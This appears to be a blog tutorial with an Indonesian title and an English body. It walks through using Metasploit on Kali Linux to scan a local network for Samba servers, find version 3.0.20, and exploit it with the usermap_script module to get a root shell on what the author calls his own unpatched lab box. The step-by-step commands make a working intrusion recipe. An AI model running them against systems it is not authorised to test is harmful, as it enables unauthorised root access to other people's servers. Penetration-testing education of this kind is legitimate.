Kali Linux: Membobol Network Neighbourhood / SAMBA
Sumber: http://www.elithecomputerguy.com/2013/01/22/hacking-samba-smb-servers-in-metasploit/
Lakukan Enumerasi
Ketik di console
msfconsole
Akan keluar kira-kira
Metasploit Park, System Security Interface Version 4.0.5, Alpha E Ready... > access security access: PERMISSION DENIED. > access security grid access: PERMISSION DENIED. > access main security grid access: PERMISSION DENIED....and... YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! Easy phishing: Set up email templates, landing pages and listeners in Metasploit Pro -- learn more on http://rapid7.com/metasploit =[ metasploit v4.11.4-2015071403 ] + -- --=[ 1467 exploits - 840 auxiliary - 232 post ] + -- --=[ 432 payloads - 37 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
type “use auxiliary/scanner/smb/smb_version” without quotes and press enter.
smbscan
You should get a prompt similar to the one above now type “show options” without quotes, this is going to bring up all the different options that can be used with this particular scanner. However, for future reference the show options command works with any module you are trying to use within the framework. (See Screen Shot Below)
show options
Now for the SMB version scanning tool it tells you under the show options what parameters must be fulfilled before running the tool. RHOSTS(Remote Hosts) is required to be set, and the number of THREADS also needs to be set. So lets go ahead and do that type: ”set RHOSTS 192.168.1.0/24” without quotations, this sets the RHOSTS to the IP range we are trying to find the SAMBA server on. Now we need to set our THREADS, and THREADS is just the amount of times it will go through and do a scan.
type: “set THREADS 75” without quotes and press enter. After you have set these parameters you will see something similar to below:
setthreads
Now that we have specified all the necessary parameters, all we need to do is type “run” without quotes and Metasploit will begin running our scan on the network. And for this blog I have setup an un-patched SAMBA server to own.
scanresults
As you can see the SMB scanner found a host running Samba server version 3.0.20. Now all we need to do is do a quick Google search for Samba 3.0.20 exploits. Take note of the host IP address in this case 192.168.1.13 we will need this later.
search
We found several results this one just happens to be on the Metasploit website itself. So it looks like there is a “command execution vulnerability in Samba,” and it also gives the module that will be used to exploit our host and deliver a payload, it’s called “username map script” Now back at our console we are going to type: “use exploit/multi/samba/usermap_script” without quotes and press enter.
Now just like with the SMBScanner we can use the show options command to see what parameters must be set before using this exploit module so let’s go ahead and do that. (See Below).
showoptions
We can see from the show options command that both RHOST (Remote Host) and RPORT (Remote Port) both need to be set before running this exploit. Go ahead and type “set RHOST 192.168.1.13” without quotes. We don’t need to set the RPORT in this case because as you can see in the screen shot it’s current settings are set to 139. Now once you have set all the parameters required to run the exploit, simply type: “exploit” without quotes and Metasploit will begin attacking our SAMBA server.
exploit
And like magic we have a command shell! Meaning we are in the SAMBA server itself, if we type “ls” without quotes this will list the directory, with this exploit we are in the root folder. Now just to be 100% sure we owned this box, I want you to type “whoami” without quotes and you can see below for yourself the server responded with “root” Good Game Samba Box!
whoami
This concludes the owning Samba Servers blog, I will have more introduction blogs coming soon on the Metasploit framework so stay tuned!